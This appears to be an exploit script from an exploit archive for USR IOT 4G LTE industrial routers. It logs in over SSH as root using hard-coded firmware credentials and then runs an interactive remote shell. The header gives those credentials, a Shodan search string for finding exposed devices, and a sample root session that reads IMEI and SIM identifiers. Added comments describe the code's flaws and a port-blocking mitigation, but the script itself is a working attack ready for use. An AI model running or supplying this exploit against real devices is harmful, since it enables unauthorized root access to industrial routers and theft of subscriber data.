## https://sploitus.com/exploit?id=1337DAY-ID-37660
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is an industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*"  // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# [email protected]:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd"  && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# [email protected]:~$ 
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

# Banner printed on start-up. The box-drawing characters were mangled by a
# mis-encoded copy of this file; the string is runtime output, so it is left
# exactly as found.
bnr='''
        β–„β€’ β–„β–Œ.β–„β–„ Β· β–„β–„β–„  β–ͺ        β–„β–„β–„β–„β–„        
        β–ˆβ–ͺβ–ˆβ–ˆβ–Œβ–β–ˆ β–€. β–€β–„ β–ˆΒ·β–ˆβ–ˆ β–ͺ     β€’β–ˆβ–ˆ          
        β–ˆβ–Œβ–β–ˆβ–Œβ–„β–€β–€β–€β–ˆβ–„β–β–€β–€β–„ β–β–ˆΒ· β–„β–ˆβ–€β–„  β–β–ˆ.β–ͺ        
        β–β–ˆβ–„β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ€’β–ˆβ–Œβ–β–ˆβ–Œβ–β–ˆβ–Œ.β–β–Œ β–β–ˆβ–ŒΒ·        
β–„β–„β–„β–„Β·  β–„β–„β–„Β·β–€ β–„β–„Β·β–€β–„ β€’β–„ Β·β–„β–„β–„β–„ β–€β–ˆβ–„β–€β–ͺ β–€β–€β–€    β–„β–„β–„  
β–β–ˆ β–€β–ˆβ–ͺβ–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–ˆβ–Œβ–„β–Œβ–ͺβ–ˆβ–ˆβ–ͺ β–ˆβ–ˆ β–ͺ     β–ͺ     β–€β–„ β–ˆΒ·
β–β–ˆβ–€β–€β–ˆβ–„β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ β–„β–„β–β–€β–€β–„Β·β–β–ˆΒ· β–β–ˆβ–Œ β–„β–ˆβ–€β–„  β–„β–ˆβ–€β–„ ▐▀▀▄ 
β–ˆβ–ˆβ–„β–ͺβ–β–ˆβ–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆ.β–ˆβ–Œβ–ˆβ–ˆ. β–ˆβ–ˆ β–β–ˆβ–Œ.β–β–Œβ–β–ˆβ–Œ.β–β–Œβ–β–ˆβ€’β–ˆβ–Œ
Β·β–€β–€β–€β–€  β–€  β–€ β–„β–„β–„β–€ Β·β–€  β–€β–€β–€β–€β–€β–€β€’ β–„β–„β–„β–„β–„β–ͺ β–€β–ˆβ–„β–€β–ͺ.β–€  β–€
            β–€β–„ β–ˆΒ·β–ͺ     β–ͺ     β€’β–ˆβ–ˆ              
            ▐▀▀▄  β–„β–ˆβ–€β–„  β–„β–ˆβ–€β–„  β–β–ˆ.β–ͺ            
            β–β–ˆβ€’β–ˆβ–Œβ–β–ˆβ–Œ.β–β–Œβ–β–ˆβ–Œ.β–β–Œ β–β–ˆβ–ŒΒ·            
         β–„β–„β–„Β·β–€ β–„β–„Β·β–€β–ˆβ–„β–„Β· β–„β–„β–„β–€..β–„β–„β–€Β· .β–„β–„ Β·      
        β–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–β–ˆ β–Œβ–ͺβ–€β–„.β–€Β·β–β–ˆ β–€. β–β–ˆ β–€.      
        β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ β–„β–„β–ˆβ–ˆ ▄▄▐▀▀β–ͺβ–„β–„β–€β–€β–€β–ˆβ–„β–„β–€β–€β–€β–ˆβ–„     
        β–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–„β–„β–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–„β–ͺβ–β–ˆ     
         β–€  β–€ Β·β–€β–€β–€ Β·β–€β–€β–€  β–€β–€β–€  β–€β–€β–€β–€  β–€β–€β–€β–€      
'''
print(bnr)

# Usage check: the only positional argument is the target address. Note that a
# missing argument exits with status 0, so a wrapper script cannot tell a
# usage error from a normal run.
if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
# The hard-coded firmware account described in the advisory header above;
# these values are fixed in the device image and not user-changeable.
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
# AutoAddPolicy accepts whatever host key the peer presents, so the session is
# not authenticated on the server side at all; no known_hosts is consulted.
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    # The SSH service is reached on TCP/2222 here (the trailing comment hints
    # that 22 is also in play). From a defender's view this is the thing to
    # watch for: inbound SSH on 2222/22 with username 'usr' on the management
    # interface, and blocking that port on untrusted interfaces is the
    # immediate mitigation until patched firmware is applied.
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    # Bare except: every failure mode (unreachable host, refused port, auth
    # rejection, even KeyboardInterrupt) is reported with the same message,
    # so "--Backdoor removed." is not proof that the credentials were fixed.
    # exit(-1) yields process status 255 on POSIX.
    print('--Backdoor removed.')
    exit(-1)

# Interactive loop: one command per line; 'exit' ends the session.
while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    # NOTE(review): each exec_command call presumably runs in a fresh session
    # channel, so shell state such as cwd does not carry over between lines
    # (the 'pwd' in the header transcript is in the same line as 'id;id root').
    # Only stdout is shown; stderr is read nowhere, so failed commands print
    # an empty line.
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

# Reached only via the 'exit' branch above; the except path leaves the client
# unclosed, which is harmless there because the process exits immediately.
rsh.close()